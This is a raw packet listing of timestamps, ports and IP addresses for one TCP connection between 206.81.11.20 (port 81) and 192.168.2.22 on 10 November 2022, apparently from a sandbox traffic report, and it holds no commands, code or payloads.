Nov 10, 2022 11:43:14.516978025 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517025948 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517031908 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.517069101 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517110109 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517132044 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.517151117 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517205000 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.517220974 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517262936 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517307043 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517318010 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.517348051 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517389059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517402887 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.517431974 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517473936 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517487049 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.517514944 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517555952 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517568111 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.517597914 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517638922 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517652988 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.517680883 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517721891 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517741919 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.517762899 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517808914 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517821074 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.517849922 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517890930 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517903090 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.517932892 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517975092 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.517987967 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518017054 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518057108 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518069983 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518099070 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518141031 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518153906 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518182039 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518224001 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518237114 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518265963 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518311024 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518321991 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518352032 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518395901 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518404961 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518438101 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518481970 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518493891 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518522024 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518563986 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518574953 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518604040 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518646002 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518657923 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518687010 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518728971 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518737078 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518769979 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518814087 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518825054 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518855095 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518917084 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.518923998 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.518966913 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519006968 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519018888 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.519051075 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519109011 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.519112110 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519171000 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519215107 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519227028 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.519258022 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519303083 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519313097 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.519345045 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519387007 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519398928 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.519428015 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519469976 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519483089 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.519510984 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519551039 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519565105 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.519593954 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519634962 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519646883 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.519676924 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519716978 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519730091 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.519758940 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519799948 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519812107 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.519840956 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519886017 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.519912958 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.528297901 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.540551901 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540600061 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540626049 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540652037 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540676117 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540694952 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.540700912 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540729046 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540745020 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.540745020 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.540755987 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540781975 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540791035 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.540807962 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540832996 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540842056 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.540859938 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540884018 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540899038 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.540909052 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540935993 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540946960 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.540961027 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540987968 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.540998936 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541013002 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541038990 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541049957 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541064024 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541090012 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541100025 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541115046 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541141987 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541152000 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541166067 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541192055 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541203022 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541218042 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541244030 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541254044 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541273117 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541297913 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541309118 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541322947 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541347980 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541359901 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541373014 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541399002 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541425943 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541434050 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541455030 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541471958 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541472912 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541492939 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541507959 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541511059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541531086 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541547060 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541549921 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541570902 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541584015 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541589022 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541609049 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541624069 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541627884 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541647911 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541663885 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541666985 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541687965 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541704893 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541711092 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541724920 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541739941 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541744947 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541764975 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541780949 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541784048 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541805029 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541817904 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.541824102 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541843891 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.541860104 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.546863079 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.546920061 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.546940088 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.546957970 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.546976089 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.546996117 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.547008038 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.547013044 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.547032118 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.547036886 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.547036886 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.547066927 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.556410074 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.565130949 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.621210098 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.621243000 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.621263027 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.621275902 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.621304989 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.621325016 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.621385098 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.623007059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.623080969 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.629616976 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629647970 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629666090 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629683018 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629700899 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629714966 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.629718065 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629738092 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629743099 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.629755020 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629772902 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629776001 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.629791021 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629808903 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629823923 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.629831076 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629849911 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629853964 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.629869938 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629887104 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629903078 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.629904985 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629924059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629935980 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.629941940 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.629967928 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.629987001 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630006075 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630023956 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630039930 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630043030 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630062103 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630074024 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630079985 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630100012 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630104065 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630119085 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630137920 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630151033 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630156994 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630176067 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630182028 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630197048 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630208969 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630215883 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630234003 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630253077 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630263090 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630271912 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630290031 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630295992 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630309105 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630326986 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630341053 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630347013 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630367041 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630373001 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630384922 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630402088 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630403042 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630419970 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630439043 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630455971 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630467892 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630474091 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630480051 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630494118 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630511045 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630527020 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630528927 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630548954 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630558014 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630567074 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630587101 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630587101 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630604982 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630624056 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630634069 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630644083 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630661964 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630662918 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630678892 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630698919 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630709887 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630717993 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630737066 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630742073 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630754948 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630774021 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630786896 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630793095 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630811930 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630816936 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630831003 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630848885 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630862951 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630866051 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630909920 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630925894 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630944967 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630963087 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.630975962 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.630980968 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.631000996 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.631006956 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.631020069 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.631038904 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.631058931 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.631068945 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.631077051 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.631095886 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.631108046 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.631114960 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.631134033 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.631160975 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.631175041 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.631897926 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643063068 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643101931 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643126011 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643151045 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643152952 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643177986 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643207073 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643218994 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643240929 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643263102 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643264055 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643286943 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643304110 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.643310070 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.643343925 CET	81	49173	206.81.11.20	192.168.2.22
